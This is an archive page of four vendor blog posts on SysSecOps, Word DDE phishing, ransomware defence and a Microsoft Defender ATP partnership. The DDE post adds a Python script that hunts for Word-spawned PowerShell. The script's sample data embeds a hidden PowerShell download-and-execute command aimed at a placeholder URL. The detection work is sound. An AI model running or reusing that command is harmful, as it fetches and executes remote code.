Monthly Archives: November 2017

SysSecOps Is Something That You Need Right Now – Charles Leaver

Written By Alan Zeichick And Presented By Charles Leaver


SysSecOps is a new term, still unfamiliar to many IT and security administrators, but it is being discussed within the industry, by analysts, and at technical conferences. SysSecOps, or Systems & Security Operations, describes the practice of uniting security teams and IT operations teams to ensure the health of enterprise technology, and of giving both the tools to respond efficiently when problems occur.

SysSecOps focuses on taking down the information walls, and disrupting the silos, that separate security teams from IT administrators.

IT operations staff exist to make sure that end users can reach their applications and that critical infrastructure runs 24 × 7. They want to maximize access and availability, and they need the data to do that job: that a new employee must be provisioned, that a disk in a RAID array has failed, that a new partner needs to be provisioned with access to a secure file repository, or that an Oracle database is ready to be migrated to the cloud. It is all about using technology to drive the business.

Same Data, Different Use Cases

While the way endpoint and network monitoring data and analytics are used is clearly tailored to the different needs of IT and security, it turns out that the underlying raw data is the same. The IT and security teams are simply looking at their own domain’s problems and situations, and acting on those use cases.

Yet sometimes IT and security need to work together. Take provisioning that new business partner: it must touch all the right systems, and it must be done securely. Or if there is a problem with a remote endpoint, such as a mobile device or a sensor on the Industrial Internet of Things, IT and security may have to collaborate to work out exactly what is going on. When IT and security share the same data sources and have access to the same tools, that job becomes much easier. That is SysSecOps.

Imagine that an IT administrator notices a server hard drive nearing full capacity, and this was not expected. Perhaps the network has been breached, and the server is now being used to stream pirated movies across the Internet. It happens, and finding and fixing that problem is a job for both IT and security. The data collected by endpoint instrumentation, and displayed through a SysSecOps-ready monitoring platform, helps both sides work together more efficiently than they would with separate, traditional IT and security tools.

SysSecOps: it is a new term and a new concept, and it is resonating with both IT and security teams. You can learn more in a brief nine-minute video in which I talk with a number of industry experts about this topic: “What is SysSecOps?”

Protect Yourself From Microsoft Word Phishing Attacks With Ziften – Charles Leaver

Written By Josh Harriman And Presented By Charles Leaver


An interesting multifaceted attack was recently reported in a blog post by Cisco’s Talos Intelligence team. I want to discuss the infection vector of this attack, because it is quite clever and because it relies on something Microsoft has said it does not intend to fix, since it is a feature and not a bug. Reports are emerging of attacks in the wild that abuse a feature of Microsoft Word called Dynamic Data Exchange (DDE). Details of how this is done are given in this blog post from SecureData.

Unique Phishing Attack with Microsoft Word

Attackers constantly look for new ways to breach an organization. Phishing is among the most common, because attackers count on someone either opening a file sent to them or visiting a ‘faked’ URL. From there, an exploit against a vulnerable piece of software typically gives them the access needed to begin their attack.

In this case, however, the documents did not carry a malicious object embedded in the Word file, which is a popular attack vector, but instead abused this feature in a sneaky way to have Word itself reach out and retrieve the actual malicious payload. The attackers could hope for, or count on, a better infection rate this way, because Word files that contain malicious content themselves can be scanned and removed before they reach the recipient.

Searching for Suspicious Behaviors with Ziften Zenith

Here at Ziften, we wanted to be able to alert on this behavior for our customers. Finding conditions that show ‘unusual’ behavior, such as Microsoft Word spawning a shell, is interesting and not expected. Take it a step further and look for PowerShell running from that spawned shell, and it gets ‘very’ interesting. Using our Search API, we can find this behavior no matter when it occurred. We do not need the system to be online at the time of the search: if it has run a program (in this case Word) that exhibited this behavior, we can find that system. Ziften is always collecting and sending relevant process data, which is why we can find it without relying on the system’s state at the time of the search.

In our Zenith console, I searched for this condition by looking for the following:

Process → Filepath contains word.exe, Child Process Filepath contains cmd.exe, Child Process commandline includes powershell

This returns the PIDs (process IDs) of the processes we saw start up under these conditions. From there we can drill down to see the important details.

In this first screenshot, we can see information about the process tree (Word spawning CMD, with PowerShell under that) on the left, and on the right side you can see details such as the system name and user, plus the start time.

In the next image, we look at the CMD process and see what was passed to PowerShell.

Most likely, when the user answered the Microsoft Word pop-up dialog, that is when the CMD shell used PowerShell to go out and fetch code hosted on the Louisiana Gov site. In the PowerShell image below we can see more detail, such as the Network Connect information recorded when it reached out to the site to pull the fonts.txt file.

That IP address ( is in fact the Louisiana Gov site. Often the Network Connect data contains interesting information that may not match what you expect.

After building our Saved Search, we can alert on these conditions as they occur across the environment. We can also build extensions that change a GPO policy to disallow DDE, or go further and find these documents and remove them from the system if desired. Being able to find interesting combinations of conditions within an environment is extremely powerful, and we are excited to have this capability in our offering.
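As an added example, and not Ziften’s own code or the Zenith query language, the following Python reproduces the same hunt over a few constructed process-start and network-connect records: the parent image path contains word.exe, the child is cmd.exe, the child’s command line mentions powershell, and each hit is joined with whatever the spawned PowerShell process connected to. Hosts, users, PIDs, paths, the download URL and the 203.0.113.10 address are all made up. Processes are keyed by (host, pid) because PIDs are only unique within one machine, which matters as soon as the search runs across a fleet.

```python
"""Hunt for Word -> cmd.exe -> PowerShell process chains in process telemetry.

Added example, not Ziften code: it mirrors the Zenith search in the post
(parent image path contains word.exe, child image is cmd.exe, child command
line mentions powershell) over constructed records, and joins any network
connections made by the PowerShell process the shell spawned.
"""
import ntpath
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Proc:
    host: str
    user: str
    pid: int
    ppid: int
    path: str
    cmdline: str
    start: str  # ISO 8601 start time


@dataclass(frozen=True)
class NetConn:
    host: str
    pid: int
    dest: str
    port: int
    url: str


OFFICE_PATH = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Hypothetical download cradle; the URL is deliberately unresolvable.
STAGER = ('powershell -NoP -W Hidden -c "IEX (New-Object Net.WebClient)'
          ".DownloadString('http://example.invalid/fonts.txt')\"")

# Constructed sample telemetry; hosts, users, PIDs, paths and URL are made up.
PROCS = [
    Proc("WS01", "alice", 100, 4, r"C:\Windows\explorer.exe", "explorer.exe", "2017-11-02T09:00:00Z"),
    Proc("WS01", "alice", 200, 100, OFFICE_PATH, '"WINWORD.EXE" /n invoice.docx', "2017-11-02T09:12:04Z"),
    # Word -> cmd.exe -> powershell.exe: the DDE pattern described in the post
    Proc("WS01", "alice", 300, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c " + STAGER, "2017-11-02T09:12:31Z"),
    Proc("WS01", "alice", 400, 300, PS_PATH, STAGER, "2017-11-02T09:12:32Z"),
    # Benign: Word spawning the print spooler helper
    Proc("WS01", "alice", 210, 200, r"C:\Windows\splwow64.exe", "splwow64.exe", "2017-11-02T09:13:00Z"),
    # Benign: a user-run shell under explorer.exe, not under Word
    Proc("WS01", "alice", 600, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe /c powershell Get-Date", "2017-11-02T10:00:00Z"),
    # Second host reuses PIDs 200/300: Word spawns cmd.exe, but no PowerShell
    Proc("WS02", "bob", 200, 100, OFFICE_PATH, '"WINWORD.EXE" /n notes.docx', "2017-11-02T11:00:00Z"),
    Proc("WS02", "bob", 300, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir", "2017-11-02T11:00:10Z"),
]
NETCONNS = [NetConn("WS01", 400, "203.0.113.10", 80, "http://example.invalid/fonts.txt")]


def find_office_shell_chains(procs, netconns=(), office_markers=("word.exe",)):
    """Return one hit per cmd.exe that was spawned by Word and launched PowerShell.

    Processes are keyed by (host, pid): PIDs are only unique per host, so a
    fleet-wide search keyed on pid alone would cross-link unrelated machines.
    """
    by_key: Dict[Tuple[str, int], Proc] = {(p.host, p.pid): p for p in procs}
    net_by_key: Dict[Tuple[str, int], List[NetConn]] = {}
    for n in netconns:
        net_by_key.setdefault((n.host, n.pid), []).append(n)

    hits = []
    for child in procs:
        if ntpath.basename(child.path).lower() != "cmd.exe":
            continue
        if "powershell" not in child.cmdline.lower():
            continue
        parent = by_key.get((child.host, child.ppid))
        if parent is None or not any(m in parent.path.lower() for m in office_markers):
            continue
        # Follow the chain one level further: PowerShell processes the shell started
        shells = [p for p in procs
                  if p.host == child.host and p.ppid == child.pid
                  and "powershell" in ntpath.basename(p.path).lower()]
        net = [(n.dest, n.port, n.url)
               for s in shells for n in net_by_key.get((s.host, s.pid), [])]
        hits.append({
            "host": child.host,
            "user": child.user,
            "word_pid": parent.pid,
            "cmd_pid": child.pid,
            "cmd_start": child.start,
            "cmdline": child.cmdline,
            "powershell_pids": [s.pid for s in shells],
            "network": net,
        })
    return hits


def format_hit(hit) -> str:
    """One-line summary suitable for an alert or a hunt report."""
    where = ", ".join(f"{d}:{p} ({u})" for d, p, u in hit["network"]) or "none recorded"
    return (f"{hit['host']} user={hit['user']} winword pid {hit['word_pid']} -> "
            f"cmd pid {hit['cmd_pid']} -> powershell {hit['powershell_pids']} "
            f"at {hit['cmd_start']}; network: {where}")


if __name__ == "__main__":
    for h in find_office_shell_chains(PROCS, NETCONNS):
        print(format_hit(h))
```

Run as a script it prints one line per hit; the same function is what a saved search or alert rule would call on each new batch of process events. The match on `word.exe` deliberately follows the post’s substring search, so it also matches WINWORD.EXE, and widening `office_markers` (for example to excel.exe) extends the same hunt to other Office applications. The two benign records, Word launching the print spooler helper and a user running PowerShell from a shell under explorer.exe, are there to show that the parent-image and command-line conditions together, not either one alone, are what make the pattern worth alerting on.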

Prevent Devastating Ransomware Attacks With These 4 Actions – Charles Leaver

Written By Alan Zeichick And Presented By Charles Leaver


Ransomware is real, and it is threatening individuals, businesses, schools, hospitals, and local governments, and there is no sign that it is stopping. In fact, it is probably increasing. Why? Let’s be honest: ransomware is probably the single most effective attack that cyber criminals have ever devised. Anyone can build ransomware using readily available tools; any money received is likely in pseudonymous, hard-to-trace Bitcoin; and if something goes wrong with decrypting someone’s hard disk, the criminal is not affected.

According to some sources, a business is hit by ransomware every forty seconds, and 60% of malware payloads were ransomware. It strikes all sectors; no industry is safe. And with the rise of Ransomware-as-a-Service (RaaS), it is going to get worse.

The good news: we can fight back. Here is a four-step battle plan.

Good Basic Hygiene

It starts with training employees how to handle malicious email. There are spoofed messages from business partners. There is phishing and targeted spearphishing. Some will get past email spam and malware filters; employees have to be taught not to click links in those messages and, of course, not to grant permission for plugins or apps to be installed.

Still, some malware, including ransomware, will get through, often by exploiting out-of-date software or unpatched systems, as in the Equifax breach. That is where the next step comes in:

Ensuring that endpoints are fully patched and completely up to date with the latest, most secure operating systems, applications, utilities, device drivers, and code libraries. That way, if there is an attack, the endpoint is healthy and best able to resist the infection.

Ransomware is not just a technology or security problem. It is a business problem. And it is about much more than the ransom demanded. That is nothing compared with the lost productivity from downtime, the bad publicity, the unhappy customers if service is disrupted, and the cost of rebuilding lost data. (And that assumes that valuable intellectual property or protected financial or patient health data was not stolen.)

What else can you do? Backup, backup, backup, and protect those backups, so that the same ransomware cannot reach and encrypt them too. Without safe, secured backups, you cannot restore data and core infrastructure in a timely fashion. That includes taking daily snapshots of virtual machines, databases, applications, source code, and configuration files.

Businesses need tools to detect, identify, and prevent malware like ransomware from spreading. That requires continuous visibility and reporting of what is happening in the environment, including “zero day” attacks that have not been seen before. Part of that is monitoring endpoints, from the smartphone to the PC to the server to the cloud, to ensure that endpoints are up to date and protected and that no unexpected changes have been made to their underlying configuration. That way, if a machine is infected by ransomware or other malware, the breach can be identified quickly, and the device isolated and shut down pending forensics and recovery. If an endpoint is breached, fast containment is critical.

The Four Tactics

Good user training. Keeping systems current with patches and fixes. Backing everything up as often as possible. And using monitoring tools that help both IT and security teams identify problems and react to them quickly. When it comes to ransomware, those are the four battle-tested tactics we need to keep our organizations safe.

You can learn more in a brief eight-minute video in which I talk with a number of industry professionals about this issue.

Your Security Will Improve With Microsoft And Ziften – Charles Leaver

Written By David Shefter And Presented By Charles Leaver


We recently announced a partnership with Microsoft that combines Ziften’s Zenith® systems and security operations platform with Windows Defender Advanced Threat Protection (ATP), providing a cloud-based “single pane of glass” to detect, view, investigate, and respond to sophisticated cyber-attacks and breaches on Windows, macOS, and Linux devices (desktops, laptops, servers, cloud instances, etc.).

Windows Defender ATP plus Ziften Zenith is a security service that enables enterprise customers to detect, investigate, respond to, and remediate advanced threats on their networks, off-network, and in the data center and cloud.

Imagine a single solution across all the devices in your business, providing scalable, state-of-the-art security in an economical and easy-to-use platform. Letting businesses around the world protect and manage devices through this ‘single pane of glass’ promises lower operational costs and genuinely improved security, with real-time global threat protection informed by data collected from billions of devices worldwide.

Microsoft and Ziften Architecture

The diagram below gives an overview of the service components and the integration between Windows Defender ATP and Ziften Zenith.

Endpoint investigation capabilities let you drill down into security alerts and understand the scope and nature of a potential breach. You can submit files for deep analysis, receive the results, and take action without leaving the Windows Defender ATP console.

Detect and Contain Threats

With the Windows Defender ATP and Ziften Zenith integration, organizations can easily detect and contain threats on Windows, macOS, and Linux systems from a single console. Windows Defender ATP and Ziften Zenith provide:

Behavior-based, cloud-powered, advanced attack detection. Find the attacks that make it past your other defenses (post-breach detection).

A rich timeline for forensic investigation and mitigation. Easily investigate the scope of any breach or suspicious behavior on any machine through a rich, six-month device timeline.

A built-in, unique threat intelligence knowledge base. Threat intelligence to quickly spot attacks, based on monitoring and data from very large numbers of devices.

The diagram below shows many of the macOS and Linux threat detection and response capabilities now available with Windows Defender ATP.

In conclusion, if you are looking to secure your endpoints and infrastructure, you should take a hard look at Windows Defender ATP and Ziften Zenith.